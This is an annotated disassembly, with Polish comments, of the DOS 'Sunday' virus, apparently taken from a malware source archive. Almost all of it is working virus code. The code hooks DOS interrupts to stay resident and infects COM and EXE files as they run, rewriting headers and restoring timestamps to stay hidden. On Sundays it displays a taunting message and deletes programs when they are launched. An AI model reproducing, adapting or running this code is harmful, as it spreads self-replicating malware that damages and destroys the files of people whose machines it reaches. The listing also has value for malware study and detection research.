L0017 dw 1460h ;old int 21h ;9197 60 14
L0019 dw 025Bh ;9199 5B 02
L001B dw 0556h ;old int 24h ;919B 56 05
L001D dw 0BA6h ;919D A6 0B
L001F dw 32400 ;30 minut zwloki ;919F 90 7E
dw 0 ;91A1 00 00
dw 0 ;91A3 00 00
dw 0 ;91A5 00 00
dw 0 ;91A7 00 00
dw 0 ;91A9 00 00
dw 0 ;91AB 00 00
dw 0E800h ;91AD 00 E8
dw 5F06h ;91AF 06 5F
L0031 dw 0C89h ;adres bloku wirusa ;91B1 89 0C
L0033 dw 80h ;wielkosc bloku wirusa (para) ;91B3 80 00
;<----- Parameter Block
L0035 dw 0 ;Environment ;91B5 00 00
dw 80h ;<- command line ;91B7 80 00
L0039 dw 0C89h ; Segment ;91B9 89 0C
dw 5Ch ;<- FCB-1 ;91BB 5C 00
L003D dw 0C89h ; Segment ;91BD 89 0C
dw 6Ch ;<- FCB-2 ;91BF 6C 00
L0041 dw 0C89h ; Segment ;91C1 89 0C
L0043 dw 0800h ;SP nosiciela ;91C3 00 08
L0045 dw 0A58h ;rel segment stosu nosiciela ;91C5 58 0A
L0047 dw 3D73h ;IP nosiciela ;91C7 73 3D
L0049 dw 0 ;CS nosiciela (rel) ;91C9 00 00
;pierwsze 3 bajty wektora int ff
L004B dw 0F000h ;91CB 00 F0
L004D db 46h ;91CD 46
L004E db 1 ;0=COM, 1=EXE ;91CE 01
;<- bufor na poczatek zbioru
L004F db 'MZ' ;91CF 4D 5A
L0051 dw 01E4h ;last page bytes ;91D1 E4 01
L0053 dw 004Dh ;file size - pages ;91D3 4D 00
dw 0004h ;91D5 04 00
L0057 dw 0020h ;header size (para) ;91D7 20 00
dw 01C1h ;91D9 C1 01
dw 0FFFFh ;91DB FF FF
L005D dw 0918h ;SS ;91DD 18 09
L005F dw 065Dh ;SP ;91DF 5D 06
L0061 dw 1984h ;suma kontrolna ;91E1 84 19
L0063 dw 00C4h ;IP ;91E3 C4 00
L0065 dw 0918h ;CS ;91E5 18 09
dw 001Eh ;91E7 1E 00
dw 0000h ;91E9 00 00
;<- bufor na 5 ostatnich bajtow zbioru
L006B db 0Ah,0,0FFh,0FFh,0FFh ;91EB 0A 00 FF FF FF
L0070 dw 5 ;File handle ;91F0 05 00
L0072 dw 20h ;atrybut zarazanego zbioru ;91F2 20 00
L0074 dw 1031h ;91F4 31 10
L0076 dw 0A337h ;91F6 37 A3
L0078 dw 200h ;bytes/sector(page) ;91F8 00 02
L007A dw 10h ;bytes/paragraph ;91FA 10 00
L007C dw 9380h ;nowa dlugosc zbioru DWORD ;91FC 80 93
L007E dw 0 ;91FD 00 00
L0080 dw 41B9h ;path nazwy programu - offset ;9200 B9 41
L0082 dw 9B2Ah ; - segment ;9202 2A 9B
L0084 db 'COMMAND.COM' ;9294 43 4F 4D 4D 41 4E 44 2E 43 4F 4D
L008F dw 0,0,0 ;929F 00 00 00 00 00 00
;================================================
; <- Start wirusa zbiorow COM
;------------------------------------------------
L0095: CLD ;9215 FC
MOV AH,0FFH ;kontrola rezydowania ;9216 B4 FF
INT 21H ;9218 CD 21
CMP AH,0FFH ;921A 80 FC FF
JNB L9234 ;-> nie rezyduje ;921D 73 15
CMP AH,4 ;921F 80 FC 04
JB L9234 ;-> nie rezyduje ;9222 72 10
;<- wirus juz rezyduje
MOV AH,0DDH ;uruchom program ;9224 B4 DD
MOV DI,100h ;miejsce docelowe programu ;9226 BF 00 01
MOV SI,OFFSET L065F ;9229 BE 5F 06
ADD SI,DI ;miejsce aktualne programu ;922C 03 F7
MOV CX,CS:[DI+11H] ;dlugosc programu oryginalna ;922E 2E 8B 4D 11
INT 21H ;9232 CD 21
L9234: MOV AX,CS ;normalizacja segmentu ;9234 8C C8
ADD AX,10h ;9236 05 10 00
MOV SS,AX ;9239 8E D0
MOV SP,OFFSET L065D ;923B BC 5D 06
PUSH AX ;segment ;923E 50
MOV AX,OFFSET L00C4 ;=L9244 ;923F B8 C4 00
PUSH AX ;offset ;9242 50
RETF ;9243 CB
;================================================
; <- Start wirusa zbioru EXE
;------------------------------------------------
L00C4:
L9244: CLD ;9244 FC
PUSH ES ;<- PSP ;9245 06
MOV CS:L0031,ES ;9246 2E 8C 06 31 00
MOV CS:L0039,ES ;924B 2E 8C 06 39 00
MOV CS:L003D,ES ;9250 2E 8C 06 3D 00
MOV CS:L0041,ES ;9255 2E 8C 06 41 00
MOV AX,ES ;segment poczatku pgm ;925A 8C C0
ADD AX,10h ;925C 05 10 00
ADD CS:L0049,AX ;relokowanie CS ;925F 2E 01 06 49 00
ADD CS:L0045,AX ;relokowanie SS ;9264 2E 01 06 45 00
MOV AH,0FFH ;czy juz rezyduje ? ;9269 B4 FF
INT 21H ;926B CD 21
CMP AH,4 ;926D 80 FC 04
JNZ L9282 ;-> jeszcze nie ;9270 75 10
POP ES ;<- uruchomienie pgm ;9272 07
MOV SS,CS:L0045 ;inicjacja stosu ;9273 2E 8E 16 45 00
MOV SP,CS:L0043 ;9278 2E 8B 26 43 00
JMP DWORD PTR CS:L0047 ;uruchomienie nosiciela ;927D 2E FF 2E 47 00
;<- zarezydowanie
L9282: XOR AX,AX ;9282 33 C0
MOV ES,AX ;9284 8E C0
MOV BX,03FCh ;int 0ffh ;9286 BB FC 03
MOV AX,ES:[BX] ;9289 26 8B 07
MOV CS:L004B,AX ;928C 2E A3 4B 00
MOV AL,ES:[BX+2] ;9290 26 8A 47 02
MOV CS:L004D,AL ;9294 2E A2 4D 00
MOV WORD PTR ES:[BX],0A5F3h ;rep movsw ;9298 26 C7 07 F3 A5
MOV BYTE PTR ES:[BX+2],0CBH ;ret ;929D 26 C6 47 02 CB
POP AX ;92A2 58
ADD AX,10h ;92A3 05 10 00
MOV ES,AX ;92A6 8E C0
PUSH CS ;92A8 0E
POP DS ;92A9 1F
MOV CX,OFFSET L065F ;dl. wir. bez podpisu ;92AA B9 5F 06
SHR CX,1 ;na slowa ;92AD D1 E9
XOR SI,SI ;offset zrodlowy ;92AF 33 F6
MOV DI,SI ;offset wynikowy ;92B1 8B FE
PUSH ES ;segment przepisanego ;92B3 06
MOV AX,OFFSET L013C ;offset kontynuacji ;92B4 B8 3C 01
PUSH AX ;92B7 50
JMP DWORD PTR L05F6 ;skok w wektor int FF ;92B8 FF 2E F6 05
;<- kontynuacja na nowym miejscu
L013C: MOV AX,CS ;92BC 8C C8
MOV SS,AX ;92BE 8E D0
MOV SP,OFFSET L065D ;92C0 BC 5D 06
XOR AX,AX ;92C3 33 C0
MOV DS,AX ;92C5 8E D8
MOV AX,CS:L004B ;odtworzenie wektora int ff ;92C7 2E A1 4B 00
MOV [BX],AX ;92CB 89 07
MOV AL,CS:L004D ;92CD 2E A0 4D 00
MOV [BX+2],AL ;92D1 88 47 02
MOV BX,SP ;sp -> paragraf ;92D4 8B DC
MOV CL,4 ;92D6 B1 04
SHR BX,CL ;92D8 D3 EB
ADD BX,20h ;+512 ;92DA 83 C3 20
and bx,0fff0h ;92DD 83 E3 F0
MOV CS:L0033,BX ;paragrafy bloku potrzebne ;92E0 2E 89 1E 33 00
MOV AH,4AH ;Set Block ;92E5 B4 4A
MOV ES,CS:L0031 ;segment bloku ;92E7 2E 8E 06 31 00
INT 21H ;92EC CD 21
MOV AX,3521h ;Get int 21h ;92EE B8 21 35
INT 21H ;92F1 CD 21
MOV CS:L0017,BX ;92F3 2E 89 1E 17 00
MOV CS:L0019,ES ;92F8 2E 8C 06 19 00
PUSH CS ;92FD 0E
POP DS ;92FE 1F
MOV DX,OFFSET L02D2 ;92FF BA D2 02
MOV AX,2521h ;Set int 21h ;9302 B8 21 25
INT 21H ;9305 CD 21
MOV ES,[L0031] ;segment wirusa ;9307 8E 06 31 00
MOV ES,ES:[2Ch] ;environment ;930B 26 8E 06 2C 00
XOR DI,DI ;szukamy nazwy nosiciela ;9310 33 FF
MOV CX,7FFFh ;9312 B9 FF 7F
XOR AL,AL ;9315 32 C0
L9317: REPNZ SCASB ;9317 F2 AE
CMP ES:[DI],AL ;9319 26 38 05
LOOPNZ L9317 ;931C E0 F9
MOV DX,DI ;pathname offset ;931E 8B D7
ADD DX,3 ;9320 83 C2 03
MOV AX,4B00h ;Load & Execute nosiciela ;9323 B8 00 4B
PUSH ES ;9326 06
POP DS ;pathname segment ;9327 1F
PUSH CS ;9328 0E
POP ES ;parameter block ;9329 07
MOV BX,OFFSET L0035 ;parameter block ;932A BB 35 00
PUSH DS ;932D 1E
PUSH ES ;932E 06
PUSH AX ;932F 50
PUSH BX ;9330 53
PUSH CX ;9331 51
PUSH DX ;9332 52
MOV AH,2AH ;Get Date ;9333 B4 2A
INT 21H ;9335 CD 21
MOV BYTE PTR CS:L000E,0 ;ptr aktywnosci wirusa ;9337 2E C6 06 0E 00 00
CMP CX,1989 ;rok ;933D 81 F9 C5 07
JZ L936F ;-> tak ;9341 74 2C
; Mistake! Range for AL is 0 ..6 !
CMP AL,7 ;niedziela ? ;9343 3C 07
JNZ L9350 ;-> nie ;9345 75 09
INC BYTE PTR CS:L000E ;ptr aktywnosci wirusa ;9347 2E FE 06 0E 00
JMP SHORT L936F ;934C EB 21
NOP ;934E 90
NOP ;934F 90
;<- to nie niedziela i rok nie 1989
L9350: MOV AX,3508h ;Get int 8 ;9350 B8 08 35
INT 21H ;9353 CD 21
MOV CS:L0013,BX ;9355 2E 89 1E 13 00
MOV CS:L0015,ES ;935A 2E 8C 06 15 00
PUSH CS ;935F 0E
POP DS ;9360 1F
MOV WORD PTR L001F,32400 ;30 minut ;9361 C7 06 1F 00 90 7E
MOV AX,2508h ;Set int 8 ;9367 B8 08 25
MOV DX,OFFSET L0216 ;936A BA 16 02
INT 21H ;936D CD 21
L936F: POP DX ;936F 5A
POP CX ;9370 59
POP BX ;9371 5B
POP AX ;9372 58
POP ES ;9373 07
POP DS ;9374 1F
PUSHF ;9375 9C
CALL DWORD PTR CS:L0017 ;old int 21h (run) ;9376 2E FF 1E 17 00
PUSH DS ;937B 1E
POP ES ;937C 07
MOV AH,49H ;Free allocated memory ;937D B4 49
INT 21H ;937F CD 21
MOV AH,4DH ;Get Return code of child proc ;9381 B4 4D
INT 21H ;9383 CD 21
MOV AH,31H ;Keep process ;9385 B4 31
MOV DX,OFFSET L065F ;adres konca ;9387 BA 5F 06
MOV CL,4 ;na paragrafy ;938A B1 04
SHR DX,CL ;938C D3 EA
ADD DX,10h ;zaokraglenie ;938E 83 C2 10
INT 21H ;9391 CD 21
;-----------------------------------------------
; Wlasna obsluga int 24h
;-----------------------------------------------
L0213: XOR AX,AX ;9393 33 C0
IRET ;9395 CF
;================================================================
; Nowa obsluga int 8
;----------------------------------------------------------------
L0216: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;9396 2E 80 3E 0E 00 01
JNZ L93CC ;-> to nie sobota ;939C 75 2E
CMP WORD PTR CS:L001F,0 ;939E 2E 83 3E 1F 00 00
JNZ L93C7 ;-> jeszcze mamy czas ;93A4 75 21
PUSH AX ;93A6 50
PUSH BX ;93A7 53
PUSH SI ;93A8 56
MOV AH,0EH ; ;93A9 B4 0E
MOV BL,1FH ;atrybut ;93AB B3 1F
LEA SI,L0251 ;'Today is SunDay...' ;93AD 8D 36 51 02
L93B1: MOV AL,CS:[SI] ;znak ;93B1 2E 8A 04
CMP AL,'$' ;koniec ? ;93B4 3C 24
JZ L93BD ;-> tak ;93B6 74 05
INT 10H ;93B8 CD 10
INC SI ;93BA 46
JMP SHORT L93B1 ;93BB EB F4
L93BD: MOV WORD PTR CS:L001F,32400 ;reset licznika na 30min;93BD 2E C7 06 1F 00 90 7E
POP SI ;93C4 5E
POP BX ;93C5 5B
POP AX ;93C6 58
L93C7: DEC WORD PTR CS:L001F ;licznik zwloki ;93C7 2E FF 0E 1F 00
L93CC: JMP DWORD PTR CS:L0013 ;oryginal int 8 ;93CC 2E FF 2E 13 00
L0251 DB 'Today is SunDay! Why do you work so hard?',LF,CR
DB 'All work and no play make you a dull boy!',LF,CR
DB "Come on ! Let's go out and have some fun!$"
;================================================================
; Nowa obsluga int 21h
;----------------------------------------------------------------
L02D2: PUSHF ;9452 9C
CMP AH,0FFH ;czy to pytanie o wirusa ? ;9453 80 FC FF
JNZ L945D ;-> nie ;9456 75 05
MOV AX,0400h ;sygnalizacja obecnosci ;9458 B8 00 04
POPF ;945B 9D
IRET ;945C CF
L945D: CMP AH,0DDH ;uruchomienie nosiciela COM ? ;945D 80 FC DD
JZ L9470 ;-> tak ;9460 74 0E
CMP AX,4B00h ;Load & Execute ? ;9462 3D 00 4B
JNZ L946A ;-> nie, przezroczystosc ;9465 75 03
JMP SHORT L949E ;-> tak ;9467 EB 35
NOP ;9469 90
L946A: POPF ;946A 9D
JMP DWORD PTR CS:L0017 ;old int 21h ;946B 2E FF 2E 17 00
L9470: POP AX ;<- 0DDh, uruchom nosiciela COM ;9470 58
POP AX ;9471 58
MOV AX,0100h ;IP ;9472 B8 00 01
MOV CS:L000A,AX ;9475 2E A3 0A 00
POP AX ;CS ;9479 58
MOV CS:L000C,AX ;947A 2E A3 0C 00
REPZ MOVSB ;przeslanie programu na wirusa ;947E F3 A4
POPF ;9480 9D
MOV AX,CS:L000F ;? ;9481 2E A1 0F 00
JMP DWORD PTR CS:L000A ;9485 2E FF 2E 0A 00
;<- uruchamianie programu w fazie aktywnosci
L948A: XOR CX,CX ;948A 33 C9
MOV AX,4301h ;Set file attributes ;948C B8 01 43
INT 21H ;948F CD 21
MOV AH,41H ;Delete Directory Entry ;9491 B4 41
INT 21H ;9493 CD 21
MOV AX,4B00h ;Load & Execute ;9495 B8 00 4B
POPF ;9498 9D
JMP DWORD PTR CS:L0017 ;old int 21h ;9499 2E FF 2E 17 00
;<- uruchamianie programu
L949E: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;949E 2E 80 3E 0E 00 01
JZ L948A ;-> aktywny ;94A4 74 E4
MOV WORD PTR CS:L0070,0FFFFh ;File handle ;94A6 2E C7 06 70 00 FF FF
MOV WORD PTR CS:L008F,0 ;94AD 2E C7 06 8F 00 00 00
MOV CS:L0080,DX ;path do programu ;94B4 2E 89 16 80 00
MOV CS:L0082,DS ;94B9 2E 8C 1E 82 00
PUSH AX ;94BE 50
PUSH BX ;94BF 53
PUSH CX ;94C0 51
PUSH DX ;94C1 52
PUSH SI ;94C2 56
PUSH DI ;94C3 57
PUSH DS ;94C4 1E
PUSH ES ;94C5 06
CLD ;94C6 FC
MOV DI,DX ;94C7 8B FA
XOR DL,DL ;aktualny drive ;94C9 32 D2
CMP BYTE PTR [DI+1],':' ;czy path z drive ? ;94CB 80 7D 01 3A
JNZ L94D6 ;-> nie, aktualny ;94CF 75 05
MOV DL,[DI] ;94D1 8A 15
AND DL,1FH ;na numer drive ;94D3 80 E2 1F
L94D6: MOV AH,36H ;Get Disk Free Space ;94D6 B4 36
INT 21H ;94D8 CD 21
CMP AX,0FFFFh ;94DA 3D FF FF
JNZ L94E2 ;-> drive number OK ;94DD 75 03
L94DF: JMP L9768 ;<- drive number invalid ;94DF E9 86 02
L94E2: MUL BX ;<sec per clus>*<avl clus> ;94E2 F7 E3
MUL CX ;*<bytes per sec> ;94E4 F7 E1
OR DX,DX ;94E6 0B D2
JNZ L94EF ;-> ponad 64 KB wolne ;94E8 75 05
CMP AX,OFFSET L065F ;=1631=dlugosc wirusa ;94EA 3D 5F 06
JB L94DF ;94ED 72 F0
L94EF: MOV DX,CS:L0080 ;path do programu ;94EF 2E 8B 16 80 00
PUSH DS ;94F4 1E
POP ES ;94F5 07
XOR AL,AL ;poszukiwanie konca ;94F6 32 C0
MOV CX,41h ;94F8 B9 41 00
REPNZ SCASB ;94FB F2 AE
MOV SI,CS:L0080 ;zamiana na duze litery ;94FD 2E 8B 36 80 00
L9502: MOV AL,[SI] ;9502 8A 04
OR AL,AL ;9504 0A C0
JZ L9516 ;9506 74 0E
CMP AL,61H ;'a' ;9508 3C 61
JB L9513 ;950A 72 07
CMP AL,7AH ;'z' ;950C 3C 7A
JA L9513 ;950E 77 03
SUB BYTE PTR [SI],20H ;' ' ;9510 80 2C 20
L9513: INC SI ;9513 46
JMP SHORT L9502 ;9514 EB EC
L9516: MOV CX,0Bh ;czy to command ? ;9516 B9 0B 00
SUB SI,CX ;9519 2B F1
MOV DI,OFFSET L0084 ;'command.com' ;951B BF 84 00
PUSH CS ;951E 0E
POP ES ;951F 07
MOV CX,0Bh ;9520 B9 0B 00
REPZ CMPSB ;9523 F3 A6
JNZ L952A ;-> nie ;9525 75 03
JMP L9768 ;-> tak, odpuszczamy ;9527 E9 3E 02
L952A: MOV AX,4300h ;Get File Attributes ;952A B8 00 43
INT 21H ;952D CD 21
JB L9536 ;952F 72 05
MOV CS:L0072,CX ;atrybut zarazanego zbioru ;9531 2E 89 0E 72 00
L9536: JB L955D ;9536 72 25
XOR AL,AL ;znacznik zbioru COM ;9538 32 C0
MOV CS:L004E,AL ;0=COM, 1=EXE ;953A 2E A2 4E 00
PUSH DS ;szukamy konca nazwy ;953E 1E
POP ES ;953F 07
MOV DI,DX ;9540 8B FA
MOV CX,41h ;9542 B9 41 00
REPNZ SCASB ;9545 F2 AE
CMP BYTE PTR [DI-2],4DH ;'M'-ostatnia litera ;9547 80 7D FE 4D
JZ L9558 ;-> tak, COM ;954B 74 0B
CMP BYTE PTR [DI-2],6DH ;'m' ;954D 80 7D FE 6D
JZ L9558 ;-> tak, com ;9551 74 05
INC BYTE PTR CS:L004E ;<- EXE ;9553 2E FE 06 4E 00
L9558: MOV AX,3D00h ;Open Handle ;9558 B8 00 3D
INT 21H ;955B CD 21
L955D: JB L95B9 ;955D 72 5A
MOV CS:L0070,AX ;File handle ;955F 2E A3 70 00
MOV BX,AX ;9563 8B D8
MOV AX,4202h ;Move file ptr EOF+offs ;9565 B8 02 42
MOV CX,0FFFFh ;-5 (piec ostatnich bajtow) ;9568 B9 FF FF
MOV DX,0FFFBh ;956B BA FB FF
INT 21H ;956E CD 21
JB L955D ;9570 72 EB
ADD AX,5 ;+5 bajtow sygnatury ;9572 05 05 00
MOV CS:L0011,AX ;dlugosc programu oryginalna ;9575 2E A3 11 00
MOV CX,5 ;dlugosc sygnatury ;9579 B9 05 00
MOV DX,OFFSET L006B ;bufor na sygnature ;957C BA 6B 00
MOV AX,CS ;957F 8C C8
MOV DS,AX ;9581 8E D8
MOV ES,AX ;9583 8E C0
MOV AH,3FH ;Read Handle ;9585 B4 3F
INT 21H ;9587 CD 21
MOV DI,DX ;przeczytana sygnatura ;9589 8B FA
MOV SI,OFFSET L0005 ;wzorzec sygnatury ;958B BE 05 00
REPZ CMPSB ;958E F3 A6
JNZ L9599 ;-> jeszcze nie zarazony ;9590 75 07
MOV AH,3EH ;Close Handle ;9592 B4 3E
INT 21H ;9594 CD 21
JMP L9768 ;9596 E9 CF 01
;<----- zarazanie zbioru
L9599: MOV AX,3524h ;Get int 24h ;9599 B8 24 35
INT 21H ;959C CD 21
MOV L001B,BX ;959E 89 1E 1B 00
MOV L001D,ES ;95A2 8C 06 1D 00
MOV DX,OFFSET L0213 ;L9393 ;95A6 BA 13 02
MOV AX,2524h ;Set int 24h ;95A9 B8 24 25
INT 21H ;95AC CD 21
LDS DX,DWORD PTR L0080 ;ptr na path ;95AE C5 16 80 00
XOR CX,CX ;95B2 33 C9
MOV AX,4301h ;Set File attributes ;95B4 B8 01 43
INT 21H ;95B7 CD 21
L95B9: JB L95F6 ;95B9 72 3B
MOV BX,CS:L0070 ;File handle ;95BB 2E 8B 1E 70 00
MOV AH,3EH ;Close Handle ;95C0 B4 3E
INT 21H ;95C2 CD 21
MOV WORD PTR CS:L0070,0FFFFh ;File handle ;95C4 2E C7 06 70 00 FF FF
MOV AX,3D02h ;Open Handle R/W ;95CB B8 02 3D
INT 21H ;95CE CD 21
JB L95F6 ;95D0 72 24
MOV CS:L0070,AX ;File handle ;95D2 2E A3 70 00
MOV AX,CS ;95D6 8C C8
MOV DS,AX ;95D8 8E D8
MOV ES,AX ;95DA 8E C0
MOV BX,L0070 ;File handle ;95DC 8B 1E 70 00
MOV AX,5700h ;Get File Date/Time ;95E0 B8 00 57
INT 21H ;95E3 CD 21
MOV L0074,DX ;95E5 89 16 74 00
MOV L0076,CX ;95E9 89 0E 76 00
MOV AX,4200h ;Move file ptr BOF+offs ;95ED B8 00 42
XOR CX,CX ;95F0 33 C9
MOV DX,CX ;95F2 8B D1
INT 21H ;95F4 CD 21
L95F6: JB L9636 ;95F6 72 3E
CMP BYTE PTR L004E,0 ;0=COM, 1=EXE ;95F8 80 3E 4E 00 00
JZ L9603 ;95FD 74 04
JMP SHORT L965C ;95FF EB 5B
NOP ;9601 90
NOP ;9602 90
;<----- Zarazenie COM'a
L9603: MOV BX,1000h ;zadanie 64KB bufora pamieci ;9603 BB 00 10
MOV AH,48H ;allocate memory ;9606 B4 48
INT 21H ;9608 CD 21
JNB L9617 ;-> powiodlo sie ;960A 73 0B
MOV AH,3EH ;Close Handle ;960C B4 3E
MOV BX,L0070 ;File handle ;960E 8B 1E 70 00
INT 21H ;9612 CD 21
JMP L9768 ;9614 E9 51 01
L9617: INC WORD PTR L008F ;9617 FF 06 8F 00
MOV ES,AX ;nowy blok pamieci ;961B 8E C0
XOR SI,SI ;961D 33 F6
MOV DI,SI ;961F 8B FE
MOV CX,OFFSET L065F ;9621 B9 5F 06
REPZ MOVSB ;przepisanie do bufora ;9624 F3 A4
MOV DX,DI ;pierwsze wolne miejsce ;9626 8B D7
MOV CX,L0011 ;dlugosc programu oryginalna ;9628 8B 0E 11 00
MOV BX,L0070 ;File handle ;962C 8B 1E 70 00
PUSH ES ;9630 06
POP DS ;9631 1F
MOV AH,3FH ;Read Handle ;9632 B4 3F
INT 21H ;9634 CD 21
L9636: JB L9657 ;9636 72 1F
ADD DI,CX ;na poczatek zbioru ;9638 03 F9
XOR CX,CX ;963A 33 C9
MOV DX,CX ;963C 8B D1
MOV AX,4200h ;Move file ptr BOF+offs ;963E B8 00 42
INT 21H ;9641 CD 21
MOV SI,OFFSET L0005 ;dopisanie ogonka ;9643 BE 05 00
MOV CX,5 ;9646 B9 05 00
PUSH DS ;9649 1E
PUSH CS ;964A 0E
POP DS ;964B 1F
REPZ MOVSB ;964C F3 A4
POP DS ;964E 1F
MOV CX,DI ;nowa dlugosc programu ;964F 8B CF
XOR DX,DX ;bufor z wynikowym programem ;9651 33 D2
MOV AH,40H ;Write Handle ;9653 B4 40
INT 21H ;9655 CD 21
L9657: JB L9666 ;9657 72 0D
JMP L9723 ;9659 E9 C7 00
;<----- Zarazenie EXE'ca
L965C: MOV CX,1Ch ;EXE file header - dlugosc ;965C B9 1C 00
MOV DX,OFFSET L004F ; - bufor ;965F BA 4F 00
MOV AH,3FH ;Read Handle ;9662 B4 3F
INT 21H ;9664 CD 21
L9666: JB L96B2 ;9666 72 4A
MOV WORD PTR L0061,1984h ;suma kontrolna ;9668 C7 06 61 00 84 19
MOV AX,L005D ;SS ;966E A1 5D 00
MOV L0045,AX ;9671 A3 45 00
MOV AX,L005F ;SP ;9674 A1 5F 00
MOV L0043,AX ;9677 A3 43 00
MOV AX,L0063 ;IP ;967A A1 63 00
MOV L0047,AX ;967D A3 47 00
MOV AX,L0065 ;CS ;9680 A1 65 00
MOV L0049,AX ;9683 A3 49 00
MOV AX,L0053 ;sile size - pages ;9686 A1 53 00
CMP WORD PTR L0051,0 ;last page bytes ;9689 83 3E 51 00 00
JZ L9691 ;968E 74 01
DEC AX ;9690 48
L9691: MUL WORD PTR L0078 ;* <bytes per page> ;9691 F7 26 78 00
ADD AX,L0051 ;+last page bytes ;9695 03 06 51 00
ADC DX,0 ;9699 83 D2 00
ADD AX,0Fh ;zaokraglenie ;969C 05 0F 00
ADC DX,0 ;969F 83 D2 00
AND AX,0FFF0h ;96A2 25 F0 FF
MOV L007C,AX ;96A5 A3 7C 00
MOV L007E,DX ;96A8 89 16 7E 00
ADD AX,OFFSET L0664 ;dlugosc z sygnatura ;96AC 05 64 06
ADC DX,0 ;96AF 83 D2 00
L96B2: JB L96EE ;96B2 72 3A
DIV WORD PTR L0078 ;bytes per page ;96B4 F7 36 78 00
OR DX,DX ;czy jest reszta ? ;96B8 0B D2
JZ L96BD ;-> nie ;96BA 74 01
INC AX ;<- jest reszta ;96BC 40
L96BD: MOV L0053,AX ;pages per file ;96BD A3 53 00
MOV L0051,DX ;last page bytes ;96C0 89 16 51 00
MOV AX,L007C ;nowa dlugosc calosci ;96C4 A1 7C 00
MOV DX,L007E ;96C7 8B 16 7E 00
DIV WORD PTR L007A ;na paragrafy ;96CB F7 36 7A 00
SUB AX,L0057 ;header size ;96CF 2B 06 57 00
MOV L0065,AX ;CS wirusa ;96D3 A3 65 00
MOV WORD PTR L0063,OFFSET L00C4 ;IP wirusa ;96D6 C7 06 63 00 C4 00
MOV L005D,AX ;SS wirusa ;96DC A3 5D 00
MOV WORD PTR L005F,OFFSET L065D ;SP wirusa ;96DF C7 06 5F 00 5D 06
XOR CX,CX ;96E5 33 C9
MOV DX,CX ;96E7 8B D1
MOV AX,4200h ;Move file ptr BOF+offs ;96E9 B8 00 42
INT 21H ;96EC CD 21
L96EE: JB L96FA ;96EE 72 0A
MOV CX,1Ch ;zapis zmodyf. headera ;96F0 B9 1C 00
MOV DX,OFFSET L004F ;96F3 BA 4F 00
MOV AH,40H ;write handle ;96F6 B4 40
INT 21H ;96F8 CD 21
L96FA: JB L970D ;96FA 72 11
CMP AX,CX ;96FC 3B C1
JNZ L9723 ;-> nie cale poszlo ;96FE 75 23
MOV DX,L007C ;nowa dlugosc zbioru ;9700 8B 16 7C 00
MOV CX,L007E ;9704 8B 0E 7E 00
MOV AX,4200h ;Move file ptr BOF+offs ;9708 B8 00 42
INT 21H ;970B CD 21
L970D: JB L9723 ;970D 72 14
XOR DX,DX ;970F 33 D2
MOV CX,065Fh ;9711 B9 5F 06
MOV AH,40H ;Write Handle ;9714 B4 40
INT 21H ;9716 CD 21
MOV CX,5 ;9718 B9 05 00
LEA DX,L0005 ;971B 8D 16 05 00
MOV AH,40H ;Write Handle ;971F B4 40
INT 21H ;9721 CD 21
;<----- wspolny koniec
L9723: CMP WORD PTR CS:L008F,0 ;znacznik zajecia bloku ;9723 2E 83 3E 8F 00 00
JZ L972F ;9729 74 04
MOV AH,49H ;Free allocated memory ;972B B4 49
INT 21H ;972D CD 21
L972F: CMP WORD PTR CS:L0070,-1 ;File handle ;972F 2E 83 3E 70 00 FF
JZ L9768 ;-> nie otwarty ;9735 74 31
MOV BX,CS:L0070 ;File handle ;9737 2E 8B 1E 70 00
MOV DX,CS:L0074 ;973C 2E 8B 16 74 00
MOV CX,CS:L0076 ;9741 2E 8B 0E 76 00
MOV AX,5701h ;Set File Time/Date ;9746 B8 01 57
INT 21H ;9749 CD 21
MOV AH,3EH ;Close Handle ;974B B4 3E
INT 21H ;974D CD 21
PUSH CS ;974F 0E
POP DS ;9750 1F
LDS DX,DWORD PTR L0080 ;ptr nazwy zbioru ;9751 C5 16 80 00
MOV CX,CS:L0072 ;atry zarazanego zbioru ;9755 2E 8B 0E 72 00
MOV AX,4301h ;Set File Attributes ;975A B8 01 43
INT 21H ;975D CD 21
LEA DX,L001B ;975F 8D 16 1B 00
MOV AX,2524h ;Set int 24h vector ;9763 B8 24 25
INT 21H ;9766 CD 21
L9768: POP ES ;9768 07
POP DS ;9769 1F
POP DI ;976A 5F
POP SI ;976B 5E
POP DX ;976C 5A
POP CX ;976D 59
POP BX ;976E 5B
POP AX ;976F 58
POPF ;9770 9D
JMP DWORD PTR CS:L0017 ;old int 21h ;9771 2E FF 2E 17 00
L05F6 dw 03FCh ;<- adres wektora int ff ;9776 FC 03
dw 0 ;9778 00 00
;<------ stos
db 0 ;977A 00
dw 0 ;977B 00 00
dw 0 ;977D 00 00
dw 0 ;977F 00 00
dw 0 ;9781 00 00
dw 0 ;9783 00 00
dw 0 ;9785 00 00
dw 0 ;9787 00 00
dw 0 ;9789 00 00
dw 0 ;978B 00 00
dw 0 ;978D 00 00
dw 0 ;978F 00 00
dw 0 ;9791 00 00
dw 0 ;9793 00 00
dw 0 ;9795 00 00
dw 0 ;9797 00 00
dw 0 ;9799 00 00
dw 0 ;979B 00 00
dw 0 ;979D 00 00
dw 0 ;979F 00 00
dw 0 ;97A1 00 00
dw 0 ;97A3 00 00
dw 0 ;97A5 00 00
dw 0 ;97A7 00 00
dw 156Ch ;97A9 6C 15
dw 1261h ;97AB 61 12
dw 2524h ;97AD 24 25
dw 0005h ;97AF 05 00
dw 0020h ;97B1 20 00
dw 04EBh ;97B3 EB 04
dw 0006h ;97B5 06 00
dw 156Ch ;97B7 6C 15
dw 2508h ;97B9 08 25
dw 0FEA5h ;97BB A5 FE
dw 07BCh ;97BD BC 07
dw 0216h ;97BF 16 02
dw 065Eh ;97C1 5E 06
dw 156Ch ;97C3 6C 15
dw 0C89h ;97C5 89 0C
dw 012Fh ;97C7 2F 01
dw 7F04h ;97C9 04 7F
dw 0075h ;97CB 75 00
dw 065Eh ;97CD 5E 06
dw 5A1Dh ;97CF 1D 5A
dw 0 ;97D1 00 00
dw 9301h ;97D3 01 93
dw 0BA6h ;97D5 A6 0B
dw 0213h ;97D7 13 02
dw 0C89h ;97D9 89 0C
dw 0F202h ;97DB 02 F2
L065D dw 2700h ;szczyt stosu ;97DD 00 27
L065F DB 0C8H,0F7h,0E1h,0EEh,0E7h ;97DF C8 F7 E1 EE E7
L0664 label byte
S9180 ENDS
END L9244
MSDOS/J-Index/Virus.MSDOS.Unknown.j_sundyb.lst
+727
View File
@@ -0,0 +1,727 @@
; COM - na poczatku
; EXE - na koncu
